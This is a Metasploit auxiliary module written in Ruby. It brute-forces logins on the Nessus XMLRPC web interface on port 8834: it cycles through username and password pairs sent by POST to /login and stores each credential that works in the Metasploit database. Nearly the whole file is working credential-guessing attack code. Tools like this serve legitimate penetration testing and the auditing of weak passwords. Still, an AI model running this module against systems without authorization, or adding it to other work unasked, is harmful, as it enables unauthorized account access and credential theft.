1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::AuthBrute
10
  include Msf::Auxiliary::Scanner
11

12
  def initialize
13
    super(
14
      'Name' => 'Nessus XMLRPC Interface Login Utility',
15
      'Description' => %q{
16
        This module simply attempts to login to a Nessus XMLRPC interface using a
17
        specific user/pass.
18
      },
19
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
20
      'License' => MSF_LICENSE,
21
      'DefaultOptions' => { 'SSL' => true }
22
    )
23

24
    register_options(
25
      [
26
        Opt::RPORT(8834),
27
        OptString.new('URI', [true, "URI for Nessus XMLRPC login. Default is /login", "/login"]),
28
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
29
      ]
30
    )
31
  end
32

33
  def run_host(ip)
34
    begin
35
      res = send_request_cgi({
36
        'uri' => datastore['URI'],
37
        'method' => 'GET'
38
      }, 25)
39
      http_fingerprint({ :response => res })
40
    rescue ::Rex::ConnectionError => e
41
      vprint_error("#{datastore['URI']} - #{e}")
42
      return
43
    end
44

45
    if not res
46
      vprint_error("#{datastore['URI']} - No response")
47
      return
48
    end
49
    if res.code != 403
50
      vprint_error("Authorization not requested")
51
      return
52
    end
53

54
    each_user_pass do |user, pass|
55
      do_login(user, pass)
56
    end
57
  end
58

59
  def do_login(user = 'nessus', pass = 'nessus')
60
    vprint_status("Trying username:'#{user}' with password:'#{pass}'")
61
    headers = {}
62

63
    begin
64
      res = send_request_cgi({
65
        'encode' => true,
66
        'uri' => datastore['URI'],
67
        'method' => 'POST',
68
        'headers' => headers,
69
        'vars_post' => {
70
          'login' => user,
71
          'password' => pass
72
        }
73
      }, 25)
74
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
75
      print_error("HTTP Connection Failed, Aborting")
76
      return :abort
77
    end
78

79
    if not res
80
      print_error("Connection timed out, Aborting")
81
      return :abort
82
    end
83

84
    if res.code != 200
85
      vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
86
      return :skip_pass
87
    end
88

89
    if res.code == 200
90
      if res.body =~ /<status>OK<\/status>/
91
        print_good("SUCCESSFUL LOGIN. '#{user}':'#{pass}'")
92
        report_cred(
93
          ip: datastore['RHOST'],
94
          port: datastore['RPORT'],
95
          service_name: 'nessus-xmlrpc',
96
          user: user,
97
          password: pass
98
        )
99
        return :next_user
100
      end
101
    end
102
    vprint_error("FAILED LOGIN. '#{user}':'#{pass}'")
103
    return :skip_pass
104
  end
105

106
  def report_cred(opts)
107
    service_data = {
108
      address: opts[:ip],
109
      port: opts[:port],
110
      service_name: opts[:service_name],
111
      protocol: 'tcp',
112
      workspace_id: myworkspace_id
113
    }
114

115
    credential_data = {
116
      origin_type: :service,
117
      module_fullname: fullname,
118
      username: opts[:user],
119
      private_data: opts[:password],
120
      private_type: :password
121
    }.merge(service_data)
122

123
    login_data = {
124
      last_attempted_at: DateTime.now,
125
      core: create_credential(credential_data),
126
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
127
    }.merge(service_data)
128

129
    create_credential_login(login_data)
130
  end
131
end
132

133